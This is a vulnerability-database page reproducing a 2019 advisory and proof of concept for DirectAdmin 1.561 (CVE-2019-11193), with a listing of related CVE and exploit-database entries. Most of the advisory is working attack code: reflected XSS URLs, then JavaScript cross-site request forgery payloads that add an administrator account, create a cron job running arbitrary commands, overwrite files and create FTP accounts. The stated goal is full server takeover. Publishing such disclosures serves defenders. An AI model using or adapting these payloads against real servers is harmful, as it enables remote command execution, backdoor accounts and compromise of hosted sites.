DirectAdmin 1.561 Cross Site Scripting

🗓️ 12 Apr 2019 00:00:00Reported by Numan OZDEMIRType

packetstorm🔗 packetstormsecurity.com👁 197 Views

DirectAdmin v1.561 Multiple Vulnerabilities Takeover

Reporter	Title	Published	Views	Family All 9
0day.today	DirectAdmin 1.561 - Multiple Vulnerabilities	15 Apr 201900:00	–	zdt
CVE	CVE-2019-11193	30 Apr 201918:36	–	cve
Cvelist	CVE-2019-11193	30 Apr 201918:36	–	cvelist
Exploit DB	DirectAdmin 1.561 - Multiple Vulnerabilities	15 Apr 201900:00	–	exploitdb
EUVD	EUVD-2019-2897	7 Oct 202500:30	–	euvd
exploitpack	DirectAdmin 1.561 - Multiple Vulnerabilities	15 Apr 201900:00	–	exploitpack
NVD	CVE-2019-11193	30 Apr 201919:29	–	nvd
Prion	Cross site request forgery (csrf)	30 Apr 201919:29	–	prion
Positive Technologies	PT-2019-12174	30 Apr 201900:00	–	ptsecurity

`# Title: DirectAdmin Multiple Vulnerabilities to Takeover the Server <=   
v1.561  
# Date: 12.04.2019  
# Author: Numan OZDEMIR  
# Vendor Homepage: https://www.directadmin.com/  
# Version: Up to v1.561.  
# CVE: CVE-2019-11193  
# [email protected] && [email protected]  
# Detailed: https://numanozdemir.com/respdisc/directadmin.pdf  
  
# Description:  
# Multiple security vulnerabilities has been discovered in popular   
server control panel DirectAdmin, by  
# InfinitumIT. Attackers can combine those security vulnerabilities and   
do a lot of critical action like server control takeover.  
# Those vulnerabilities (Cross Site Scripting and Cross Site Request   
Forgery) may cause them to happen:  
# Add administrator, execute command remote (RCE), Full Backup the   
Server and Upload the Own Server, webshell upload and more.  
  
# Reflected XSS Vulnerabilities:  
# https://SERVERIP:2222/CMD_FILE_MANAGER/XSS-PAYLOAD  
# https://SERVERIP:2222/CMD_SHOW_USER?user=XSS-PAYLOAD  
# https://SERVERIP:2222/CMD_SHOW_RESELLER?user=XSS-PAYLOAD  
  
# Example Payloads:  
# Add Administrator:  
var url = "http://SERVERIP:2222/CMD_ACCOUNT_ADMIN";  
var params =  
"fakeusernameremembered=&fakepasswordremembered=&action=create&username=username&emai  
l=test%40test.com&passwd=password&passwd2=password&notify=ye";  
var vuln = new XMLHttpRequest();  
vuln.open("POST", url, true);  
vuln.withCredentials = 'true';  
vuln.setRequestHeader("Content-type",  
"application/x-www-form-urlencoded");  
vuln.send(params);  
  
# Remote Command Execution by Cron Jobs:  
var url = "http://SERVERIP:2222/CMD_CRON_JOBS";  
var params =  
"action=create&minute=*&hour=*&dayofmonth=*&month=*&dayofweek=*&command=command";  
var vuln = new XMLHttpRequest();  
vuln.open("POST", url, true);  
vuln.withCredentials = 'true';  
vuln.setRequestHeader("Content-type",  
"application/x-www-form-urlencoded");  
vuln.send(params);  
  
# Edit File:  
var url = "http://SERVERIP:2222/CMD_ADMIN_FILE_EDITOR";  
var params = "file=the-file-full-path&action=save&text=new-content";  
var vuln = new XMLHttpRequest();  
vuln.open("POST", url, true);  
vuln.withCredentials = 'true';  
vuln.setRequestHeader("Content-type",  
"application/x-www-form-urlencoded");  
vuln.send(params);  
  
# Create FTP Account:  
var url = "http://SERVERIP:2222/CMD_FTP";  
var params =  
"fakeusernameremembered=&fakepasswordremembered=&action=create&domain=infinitumit.com.tr  
&user=username&passwd=password&random=Save+Password&passwd2=password&type=domain&cu  
stom_val=%2Fhome%2Fusername&create=Create";  
var vuln = new XMLHttpRequest();  
vuln.open("POST", url, true);  
vuln.withCredentials = 'true';  
vuln.setRequestHeader("Content-type",  
"application/x-www-form-urlencoded");  
vuln.send(params);  
  
  
# Vulnerabilities are fixed in minutes, thanks to DirectAdmin.  
# InfinitumIT / For safer days...  
  
`

12 Apr 2019 00:00Current

8.9High risk

Vulners AI Score8.9

EPSS0.01231